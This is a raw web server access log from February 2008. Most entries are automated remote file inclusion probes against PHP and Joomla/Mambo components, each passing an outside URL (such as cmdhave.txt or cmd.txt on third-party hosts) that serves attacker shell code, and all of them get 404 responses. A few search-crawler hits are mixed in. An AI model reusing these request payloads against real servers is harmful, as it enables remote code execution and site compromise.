67.15.190.12 - - [21/Feb/2008:04:45:12 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [21/Feb/2008:04:45:12 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.106.251.51 - - [21/Feb/2008:04:45:12 -0800] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.106.251.51 - - [21/Feb/2008:04:45:12 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.106.251.51 - - [21/Feb/2008:04:45:13 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.106.251.51 - - [21/Feb/2008:04:45:15 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.190.12 - - [21/Feb/2008:04:45:15 -0800] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.158.86 - - [21/Feb/2008:04:46:05 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.158.86 - - [21/Feb/2008:04:46:05 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.63.184 - - [21/Feb/2008:04:46:08 -0800] "GET //skin/zero_vote/error.php?dir=http://www.brokencomplex.com/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:46:10 -0800] "GET /logs/access_080211.log/joomla/index.php?option=com_restaurante&task=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:46:10 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:46:11 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [21/Feb/2008:04:46:28 -0800] "GET /logs/access_080108.log/joomla/index.php?option=com_restaurante&task=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [21/Feb/2008:04:47:21 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.133.173 - - [21/Feb/2008:04:47:21 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.riothost.com/billing/downloads/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:04:48:16 -0800] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:04:48:16 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:04:48:16 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [21/Feb/2008:04:48:27 -0800] "GET /logs/access_080117.log//login.php?dir=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [21/Feb/2008:04:48:27 -0800] "GET //login.php?dir=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [21/Feb/2008:04:48:27 -0800] "GET /logs//login.php?dir=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [21/Feb/2008:04:48:32 -0800] "GET /logs/access_080211.log//login.php?dir=http://xucx.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:04:49:08 -0800] "GET /logs/access.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://bobatka.info/modules/language/asc/asc/r7????%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:04:49:08 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://bobatka.info/modules/language/asc/asc/r7????%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:04:49:10 -0800] "GET /config.php?path_to_root=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:04:49:10 -0800] "GET /logs/config.php?path_to_root=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:04:50:12 -0800] "GET /order/login.php?svr_rootscript=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:04:50:12 -0800] "GET /logs/order/login.php?svr_rootscript=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
208.186.169.183 - - [21/Feb/2008:04:50:25 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.203.223.115 - - [21/Feb/2008:04:50:29 -0800] "GET /logs/access_080131.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://bobatka.info/modules/language/asc/asc/r7????%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:50:41 -0800] "GET /logs/access_080130.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://220.134.235.165/modules/xoopsgallery/cache/albums/..../o?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:50:42 -0800] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://220.134.235.165/modules/xoopsgallery/cache/albums/..../o?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:50:42 -0800] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://220.134.235.165/modules/xoopsgallery/cache/albums/..../o?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:50:47 -0800] "GET /logs/access_080130.log/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://220.134.235.165/modules/xoopsgallery/cache/albums/..../o?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:50:47 -0800] "GET /component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://220.134.235.165/modules/xoopsgallery/cache/albums/..../o?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:50:47 -0800] "GET /logs/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://220.134.235.165/modules/xoopsgallery/cache/albums/..../o?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:51:23 -0800] "GET /component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://220.134.235.165/modules/xoopsgallery/cache/albums/..../o?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:51:31 -0800] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://220.134.235.165/modules/xoopsgallery/cache/albums/..../o?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.120 - - [21/Feb/2008:04:51:37 -0800] "GET /plans/A4_SCHEMAIC_SECTION.pdf HTTP/1.0" 200 1814141 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.255.3.68 - - [21/Feb/2008:04:52:55 -0800] "GET /logs//Exchange/include.php?webappcfg[APPPATH]=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.255.3.68 - - [21/Feb/2008:04:52:56 -0800] "GET //Exchange/include.php?webappcfg[APPPATH]=http://www.fox-forge.biz//includes/com_log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.7.68 - - [21/Feb/2008:04:53:18 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
211.233.7.68 - - [21/Feb/2008:04:53:18 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.geocities.com/ntcinfo/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
59.120.13.92 - - [21/Feb/2008:04:53:32 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://smkk.by.ru/cmdhave.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [21/Feb/2008:04:53:36 -0800] "GET /logs/access_080108.log/services.php?page=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [21/Feb/2008:04:53:36 -0800] "GET /services.php?page=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.151 - - [21/Feb/2008:04:53:36 -0800] "GET /logs/services.php?page=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:53:36 -0800] "GET /logs/access_080122.log/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://220.134.235.165/modules/xoopsgallery/cache/albums/..../o?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.130.198 - - [21/Feb/2008:04:53:48 -0800] "GET /logs/access_080122.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://220.134.235.165/modules/xoopsgallery/cache/albums/..../o?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:04:54:00 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:04:54:00 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:04:54:01 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:04:54:01 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.6.8.120 - - [21/Feb/2008:04:54:20 -0800] "GET /bikes/GPS/ HTTP/1.0" 200 800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
194.79.75.195 - - [21/Feb/2008:04:54:21 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:04:54:57 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:04:54:57 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:04:54:57 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:04:54:57 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
69.64.76.29 - - [21/Feb/2008:04:55:28 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.120 - - [21/Feb/2008:04:56:07 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:04:56:14 -0800] "GET /logs/access_080117.log//login.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:04:56:15 -0800] "GET /logs//login.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [21/Feb/2008:04:56:20 -0800] "GET /logs/access_080211.log//login.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.50.208.8 - - [21/Feb/2008:04:56:27 -0800] "GET /logs/access_080118.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.4 - - [21/Feb/2008:04:56:27 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.50.208.9 - - [21/Feb/2008:04:56:27 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.20.233 - - [21/Feb/2008:04:56:38 -0800] "GET /logs/access_080121.log HTTP/1.0" 200 717411 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.50.208.9 - - [21/Feb/2008:04:59:52 -0800] "GET /logs/access_071230.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:00:10 -0800] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:00:10 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:00:11 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:00:21 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.120.13.92 - - [21/Feb/2008:05:00:50 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://smkk.by.ru/cmdhave.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.59.65 - - [21/Feb/2008:05:01:57 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.send2thailand.com/cache/cache_c21f969b5f03d33d43e04f8f136e7682_3f46aa4070409dc6745ea50a9859f388/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:02:06 -0800] "GET /logs/access_080211.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:02:07 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:02:09 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:02:15 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.72.254.250 - - [21/Feb/2008:05:03:46 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:05:04:12 -0800] "GET /logs/errors.php?error=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:05:04:12 -0800] "GET /errors.php?error=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:05:04:13 -0800] "GET /errors.php?error=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
88.255.117.182 - - [21/Feb/2008:05:04:13 -0800] "GET /logs/errors.php?error=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:04:26 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:04:27 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.120 - - [21/Feb/2008:05:04:39 -0800] "GET /logs/access_070905.log HTTP/1.0" 200 42196 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.120 - - [21/Feb/2008:05:05:17 -0800] "GET /logs/access_071223.log HTTP/1.0" 200 97760 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.11.181 - - [21/Feb/2008:05:05:37 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.8.120 - - [21/Feb/2008:05:06:34 -0800] "GET /mobilehackers/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071214 BonEcho/2.0.0.4" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:05:06:56 -0800] "GET /errors.php?error=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:05:06:56 -0800] "GET /logs/errors.php?error=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:05:06:57 -0800] "GET /errors.php?error=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
218.189.208.72 - - [21/Feb/2008:05:06:57 -0800] "GET /logs/errors.php?error=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:07:11 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:07:16 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:10:06 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:10:07 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:10:07 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:12:03 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.72.254.250 - - [21/Feb/2008:05:13:19 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:05:13:20 -0800] "GET /index.php?body=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.29.188.25 - - [21/Feb/2008:05:13:20 -0800] "GET /logs/index.php?body=http://smkk.by.ru/cmdhave.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
209.172.48.89 - - [21/Feb/2008:05:15:09 -0800] "GET /logs/access_080118.log//include/functions_common.php?gl_root_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.48.89 - - [21/Feb/2008:05:15:09 -0800] "GET //include/functions_common.php?gl_root_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.48.89 - - [21/Feb/2008:05:15:10 -0800] "GET /logs//include/functions_common.php?gl_root_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.22 - - [21/Feb/2008:05:15:29 -0800] "GET /logs/access_080219.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:15:42 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.237.208.43 - - [21/Feb/2008:05:15:43 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.shearmanmitchell.com//design/components/com_logout/xx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
